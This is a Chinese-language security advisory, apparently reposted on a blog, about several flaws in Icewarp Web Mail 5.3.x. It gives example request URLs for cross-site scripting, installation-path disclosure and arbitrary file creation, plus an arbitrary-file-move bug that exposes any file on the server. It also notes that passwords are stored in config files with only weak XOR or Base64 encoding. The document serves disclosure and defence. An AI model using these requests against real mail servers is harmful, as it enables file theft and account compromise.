商务合作:179001057@qq.com

Icewarp Web Mail存在多个安全漏洞

技术2022-05-11  0


某平台价值19860元的编程课程资料免费领取【点我领取】


  受影响系统: Icewarp Web Mail 5.3.2 Icewarp Web Mail 5.3.0 描述: -------------------------------------------------------------------------------- MERAK Mail Server使用Icewarp Web Mail作为WEB邮件系统。 Icewarp web mail存在多个安全问题,远程攻击者可以利用这些漏洞建立任意文件,进行跨站脚本,获得安装路径等攻击。 1、多个跨站脚本: 拥有帐户的远程用户,可通过如下页面进行跨站脚本攻击: login.html accountsettings_add.html calendar_addnote.html calendar_addtask.html calendar_addevent.html 如: http://localhost:32000/mail/login.html?username=[xss_here] http://localhost:32000/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hac / ker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&accoun / t[HOSTPASS2]=31337&accountid=[xss_here] http://localhost:32000/mail/calendar.html -》 / AddNote -》 [Title]= [xss_here] http://localhost:32000/mail/calendar.html -》 AddTask / -》 [Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 / [Note]=[xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Title]= / [xss_here] http://localhost:32000/mail/calendar.html -》 AddEvent -》 [Location]= / [xss_here] 2、安装路径泄露 拥有帐户的远程用户,可通过如下请求获得安装路径信息: http://localhost:32000/mail/calendar_d.html?id=[sessionid] http://localhost:32000/mail/calendar_m.html?id=[sessionid] http://localhost:32000/mail/calendar_w.html?id=[sessionid] http://localhost:32000/mail/calendar_y.html?id=[sessionid] 3、用户密码简单加密 users.cfg, settings.cfg (XOR), users.dat, user.dat (BASE64)中的用户密码加密非常简单,攻击者可以通过访问这些文件获得用户和管理员密码。 4、任意文件建立 远程用户可以通过提交如下请求,在系统中建立任意内容的文件,文件路径为:[MerakDir]/webmail/users/[Domain]/[User]/accounts.dat. http://localhost:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[E / MAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=313 / 37&account[HOSTPASS2]=31337&accountid=[arbitary text] 5、移动和查看系统任意文件: 拥有帐户的远程用户可以一定本地系统上的任意文件,文件会被移到[MerakDir]/webmail/users/[Domain]/[User]目录 中,并更改为import.tmp,攻击者可以查看此文件或者导出/入到地址簿。此漏洞可以用来查看任意文件内容,或进行拒绝服务攻击。 http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary / path]&action=upload&Import=1&importfile_size=1000000


最新回复(0)